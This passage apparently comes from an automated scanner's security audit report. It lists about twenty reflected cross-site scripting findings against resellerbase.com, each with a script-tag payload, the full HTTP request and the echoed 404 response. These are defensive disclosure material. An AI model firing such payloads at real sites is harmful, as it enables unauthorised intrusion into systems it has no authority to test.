User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29cefb9<script>alert(1)</script>104fe8229fe/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2016. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2afc5<script>alert(1)</script>2fd305bed36 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes2afc5<script>alert(1)</script>2fd305bed36/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes2afc5<script>alert(1)</script>2fd305bed36/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2017. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85924<script>alert(1)</script>6a24f622b70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos85924<script>alert(1)</script>6a24f622b70/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos85924<script>alert(1)</script>6a24f622b70/ was not found on this server.</p>
...[SNIP]...

2.2018. http://www.resellerbase.com/detail/29/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4422<script>alert(1)</script>8b4716c3317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/?e4422<script>alert(1)</script>8b4716c3317=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/?e4422<script>alert(1)</script>8b4716c3317=1 was not found on this server.</p>
...[SNIP]...

2.2019. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc6c2<script>alert(1)</script>c561bdc5691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc6c2<script>alert(1)</script>c561bdc5691/29/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc6c2<script>alert(1)</script>c561bdc5691/29/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2020. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 836aa<script>alert(1)</script>b8b2868f203 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29836aa<script>alert(1)</script>b8b2868f203/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29836aa<script>alert(1)</script>b8b2868f203/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2021. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 829f5<script>alert(1)</script>b70f80f62dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes829f5<script>alert(1)</script>b70f80f62dd/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes829f5<script>alert(1)</script>b70f80f62dd/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2022. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a32d<script>alert(1)</script>32f5d861b9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos8a32d<script>alert(1)</script>32f5d861b9f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos8a32d<script>alert(1)</script>32f5d861b9f/images/ was not found on this server.</p>
...[SNIP]...

2.2023. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e834e<script>alert(1)</script>15928abc0b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/imagese834e<script>alert(1)</script>15928abc0b5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/imagese834e<script>alert(1)</script>15928abc0b5/ was not found on this server.</p>
...[SNIP]...

2.2024. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dff1c<script>alert(1)</script>5ed5e28a9a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/?dff1c<script>alert(1)</script>5ed5e28a9a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/?dff1c<script>alert(1)</script>5ed5e28a9a5=1 was not found on this server.</p>
...[SNIP]...

2.2025. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ec01<script>alert(1)</script>b4c37190058 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ec01<script>alert(1)</script>b4c37190058/29/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ec01<script>alert(1)</script>b4c37190058/29/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2026. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 685ed<script>alert(1)</script>c52af3ce70f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29685ed<script>alert(1)</script>c52af3ce70f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29685ed<script>alert(1)</script>c52af3ce70f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2027. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3c6a0<script>alert(1)</script>d18c0ba143b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes3c6a0<script>alert(1)</script>d18c0ba143b/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes3c6a0<script>alert(1)</script>d18c0ba143b/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2028. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29504<script>alert(1)</script>92e29075490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos29504<script>alert(1)</script>92e29075490/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos29504<script>alert(1)</script>92e29075490/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2029. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 887f9<script>alert(1)</script>53bebb9d882 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images887f9<script>alert(1)</script>53bebb9d882/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images887f9<script>alert(1)</script>53bebb9d882/rating/ was not found on this server.</p>
...[SNIP]...

2.2030. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 87b50<script>alert(1)</script>b0bccd71d61 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating87b50<script>alert(1)</script>b0bccd71d61/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating87b50<script>alert(1)</script>b0bccd71d61/ was not found on this server.</p>
...[SNIP]...

2.2031. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 640fb<script>alert(1)</script>f5e61753262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/?640fb<script>alert(1)</script>f5e61753262=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/?640fb<script>alert(1)</script>f5e61753262=1 was not found on this server.</p>
...[SNIP]...

2.2032. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48faa<script>alert(1)</script>dd80c9993a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail48faa<script>alert(1)</script>dd80c9993a7/29/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail48faa<script>alert(1)</script>dd80c9993a7/29/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2033. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f1a5<script>alert(1)</script>465fd9be89a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295f1a5<script>alert(1)</script>465fd9be89a/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295f1a5<script>alert(1)</script>465fd9be89a/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2034. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec18d<script>alert(1)</script>3439eade4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themesec18d<script>alert(1)</script>3439eade4d/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themesec18d<script>alert(1)</script>3439eade4d/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2035. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

